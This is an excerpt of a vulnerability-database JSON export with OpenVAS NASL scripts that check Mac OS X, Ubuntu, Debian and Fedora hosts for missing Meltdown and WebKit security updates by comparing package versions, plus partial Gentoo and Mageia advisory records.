webkitgtk4 FEDORA-2017-06b373d942\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-06b373d942\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XRYO7XC2EWI6UKLYRIYC5MTUC27I36GS\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812662\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2017-5754\");\n script_bugtraq_id(102378);\n script_tag(name:\"cvss_base\", value:\"4.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-01-24 10:47:13 +0530 (Wed, 24 Jan 2018)\");\n script_name(\"Apple Mac OS X Speculative Execution Side-Channel Vulnerability-Meltdown (HT208465)\");\n\n script_tag(name:\"summary\", value:\"This host is running Apple Mac OS X and\n is prone to an information disclosure vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists as systems with\n microprocessors utilizing speculative execution and indirect branch prediction\n may allow unauthorized disclosure of information to an attacker with local user\n access via a side-channel analysis of the data cache.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to read kernel memory (Meltdown).\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X version 10.12.x through\n 10.12.6 before build 16G1212 and 10.11.x through 10.11.6 before build 15G19009.\");\n\n script_tag(name:\"solution\", value:\"Apply the supplemental update from the vendor.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", 
value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208465\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.1[12]\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName || \"Mac OS X\" >!< osName){\n exit(0);\n}\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^10\\.1[12]\"){\n exit(0);\n}\n\nif(version_in_range(version:osVer, test_version:\"10.11\", test_version2:\"10.11.5\") ||\n version_in_range(version:osVer, test_version:\"10.12\", test_version2:\"10.12.5\")){\n fix = \"Upgrade to latest OS release and apply patch from vendor\";\n }\n\nelse if(osVer == \"10.11.6\" || osVer == \"10.12.6\")\n{\n buildVer = get_kb_item(\"ssh/login/osx_build\");\n if(buildVer)\n {\n ##https://en.wikipedia.org/wiki/MacOS_Sierra\n ##https://en.wikipedia.org/wiki/OS_X_El_Capitan\n if((osVer == \"10.11.6\" && version_is_less(version:buildVer, test_version:\"15G19009\")) ||\n (osVer == \"10.12.6\" && version_is_less(version:buildVer, test_version:\"16G1212\")))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n }\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:osVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-05-29T18:33:18", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-01-11T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux USN-3522-3", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5754"], "modified": "2019-03-13T00:00:00", "id": 
"OPENVAS:1361412562310843414", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843414", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3522_3.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3522-3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843414\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-01-11 07:38:35 +0100 (Thu, 11 Jan 2018)\");\n script_cve_id(\"CVE-2017-5754\");\n script_tag(name:\"cvss_base\", value:\"4.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3522-3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", 
value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3522-1 fixed a vulnerability in the\n Linux kernel to address Meltdown (CVE-2017-5754). Unfortunately, that update\n introduced a regression where a few systems failed to boot successfully. This\n update fixes the problem. We apologize for the inconvenience. Original advisory\n details: Jann Horn discovered that microprocessors utilizing speculative\n execution and indirect branch prediction may allow unauthorized memory reads via\n sidechannel attacks. This flaw is known as Meltdown. A local attacker could use\n this to expose sensitive information, including kernel memory.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3522-3\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3522-3/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-109-generic\", ver:\"4.4.0-109.132\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-109-lowlatency\", ver:\"4.4.0-109.132\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.4.0.109.114\", 
rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.4.0.109.114\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-05-29T18:33:21", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-01-10T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-aws USN-3522-2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5754"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310843413", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843413", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3522_2.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-aws USN-3522-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843413\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-01-10 07:40:12 +0100 (Wed, 10 Jan 2018)\");\n script_cve_id(\"CVE-2017-5754\");\n script_tag(name:\"cvss_base\", value:\"4.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-aws USN-3522-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-aws'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3522-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding\n updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for\n Ubuntu 14.04 LTS. Jann Horn discovered that microprocessors utilizing\n speculative execution and indirect branch prediction may allow unauthorized\n memory reads via sidechannel attacks. This flaw is known as Meltdown. A local\n attacker could use this to expose sensitive information, including kernel\n memory. 
(CVE-2017-5754)\");\n script_tag(name:\"affected\", value:\"linux-aws on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3522-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3522-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1009-aws\", ver:\"4.4.0-1009.9\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-108-generic\", ver:\"4.4.0-108.131~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-108-lowlatency\", ver:\"4.4.0-108.131~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1009.9\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lts-xenial\", ver:\"4.4.0.108.91\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-lts-xenial\", ver:\"4.4.0.108.91\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.7, 
"vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-07-04T18:56:27", "description": "Multiple researchers have discovered a vulnerability in Intel processors,\nenabling an attacker controlling an unprivileged process to read memory from\narbitrary addresses, including from the kernel and all other processes running\non the system.\n\nThis specific attack has been named Meltdown and is addressed in the Linux\nkernel for the Intel x86-64 architecture by a patch set named Kernel Page Table\nIsolation, enforcing a near complete separation of the kernel and userspace\naddress maps and preventing the attack. This solution might have a performance\nimpact, and can be disabled at boot time by passing pti=off\nto the\nkernel command line.\n\nWe also identified a regression for ancient userspaces using the vsyscall\ninterface, for example chroot and containers using (e)glibc 2.13 and older,\nincluding those based on Debian 7 or RHEL/CentOS 6. This regression will be\nfixed in a later update.\n\nThe other vulnerabilities (named Spectre) published at the same time are not\naddressed in this update and will be fixed in a later update.", "cvss3": {}, "published": "2018-01-04T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4078-1 (linux - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5754"], "modified": "2019-07-04T00:00:00", "id": "OPENVAS:1361412562310704078", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704078", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4078-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; 
you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704078\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2017-5754\");\n script_name(\"Debian Security Advisory DSA 4078-1 (linux - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-01-04 00:00:00 +0100 (Thu, 04 Jan 2018)\");\n script_tag(name:\"cvss_base\", value:\"4.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4078.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"linux on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution 
(jessie), this problem will be fixed in a\nseparate update.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 4.9.65-3+deb9u2.\n\nWe recommend that you upgrade your linux packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/linux\");\n script_tag(name:\"summary\", value:\"Multiple researchers have discovered a vulnerability in Intel processors,\nenabling an attacker controlling an unprivileged process to read memory from\narbitrary addresses, including from the kernel and all other processes running\non the system.\n\nThis specific attack has been named Meltdown and is addressed in the Linux\nkernel for the Intel x86-64 architecture by a patch set named Kernel Page Table\nIsolation, enforcing a near complete separation of the kernel and userspace\naddress maps and preventing the attack. This solution might have a performance\nimpact, and can be disabled at boot time by passing pti=off\nto the\nkernel command line.\n\nWe also identified a regression for ancient userspaces using the vsyscall\ninterface, for example chroot and containers using (e)glibc 2.13 and older,\nincluding those based on Debian 7 or RHEL/CentOS 6. 
This regression will be\nfixed in a later update.\n\nThe other vulnerabilities (named Spectre) published at the same time are not\naddressed in this update and will be fixed in a later update.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"hyperv-daemons\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libcpupower-dev\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libcpupower1\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libusbip-dev\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-compiler-gcc-6-arm\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-compiler-gcc-6-s390\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-compiler-gcc-6-x86\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-cpupower\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-doc-4.9\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-4kc-malta\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-5kc-malta\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-686\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-686-pae\", ver:\"4.9.65-3+deb9u2\", 
rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-amd64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-arm64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-armel\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-armhf\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-i386\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-mips\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-mips64el\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-mipsel\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-ppc64el\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-s390x\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-amd64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-arm64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-armmp\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-armmp-lpae\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) 
{\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-common\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-common-rt\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-loongson-3\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-marvell\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-octeon\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-powerpc64le\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-rt-686-pae\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-rt-amd64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-s390x\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-4kc-malta\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-5kc-malta\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-686\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-686-pae\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-amd64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += 
res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-arm64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-armel\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-armhf\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-i386\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-mips\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-mips64el\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-mipsel\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-ppc64el\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-s390x\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-amd64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-arm64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-armmp\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-armmp-lpae\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-common\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-common-rt\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += 
["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4089", "CVE-2018-4096"], "modified": "2018-03-22T00:00:00", "id": "GLSA-201803-11", "href": "https://security.gentoo.org/glsa/201803-11", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "The webkit2 package has been updated to version 2.18.4, fixing several security issues and other bugs. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-01T01:17:34", "type": "mageia", "title": 